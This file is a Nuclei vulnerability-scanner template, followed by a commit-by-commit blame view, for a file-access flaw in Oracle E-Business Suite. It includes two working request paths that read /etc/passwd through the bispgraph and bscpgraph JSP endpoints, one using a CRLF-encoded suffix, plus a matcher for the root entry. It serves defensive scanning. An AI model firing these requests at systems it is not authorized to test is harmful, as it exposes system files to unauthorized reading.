nuclei-templates/vulnerabilities/oracle/oracle-ebs-bispgraph-file-a...

id: oracle-ebs-bispgrapgh-file-read

info:
  name: Oracle eBusiness Suite - Improper File Access
  author: emenalf,tirtha_mandal,thomas_from_offensity
  severity: critical
  description: |
    Oracle eBusiness Suite is susceptible to improper file access vulnerabilities via bispgrapgh. Be aware this product is no longer supported with patches or security fixes.
  reference:
    - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
    - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
  tags: oracle,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/"
      - "{{BaseURL}}/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd"

    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

# Enhanced by mp on 2022/05/26
updating template 2020-07-28 15:14:22 +00:00			`id: oracle-ebs-bispgrapgh-file-read`
add few descriptions add few descriptions and references on /vulnerabilities/ templates. 2020-08-25 19:43:43 +00:00
trailing-spaces 2020-07-31 10:02:19 +00:00			`info:`
Enhancement: vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml by mp 2022-05-26 19:56:32 +00:00			`name: Oracle eBusiness Suite - Improper File Access`
Updated author names 2021-06-09 12:20:56 +00:00			`author: emenalf,tirtha_mandal,thomas_from_offensity`
uniform format 2020-08-31 18:34:29 +00:00			`severity: critical`
Update oracle-ebs-bispgraph-file-access.yaml 2022-05-31 09:02:35 +00:00			`description: \|`
			`Oracle eBusiness Suite is susceptible to improper file access vulnerabilities via bispgrapgh. Be aware this product is no longer supported with patches or security fixes.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Add references 2021-05-05 14:32:21 +00:00			`- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf`
			`- http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`tags: oracle,lfi`
add few descriptions add few descriptions and references on /vulnerabilities/ templates. 2020-08-25 19:43:43 +00:00
updating template 2020-07-28 15:14:22 +00:00			`requests:`
			`- method: GET`
trailing-spaces 2020-07-31 10:02:19 +00:00			`path:`
updating template 2020-07-28 15:14:22 +00:00			`- "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/"`
template update 2020-10-07 22:19:59 +00:00			`- "{{BaseURL}}/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd"`
updating template 2020-07-28 15:14:22 +00:00
trailing-spaces 2020-07-31 10:02:19 +00:00			`matchers:`
updating template 2020-07-28 15:14:22 +00:00			`- type: regex`
Update oracle-ebs-bispgraph-file-access.yaml 2022-05-31 09:02:35 +00:00			`part: body`
updating template 2020-07-28 15:14:22 +00:00			`regex:`
matcher update to handle edge cases 2021-07-24 21:35:55 +00:00			`- "root:.*:0:0:"`
Enhancement: vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml by mp 2022-05-26 19:56:32 +00:00
			`# Enhanced by mp on 2022/05/26`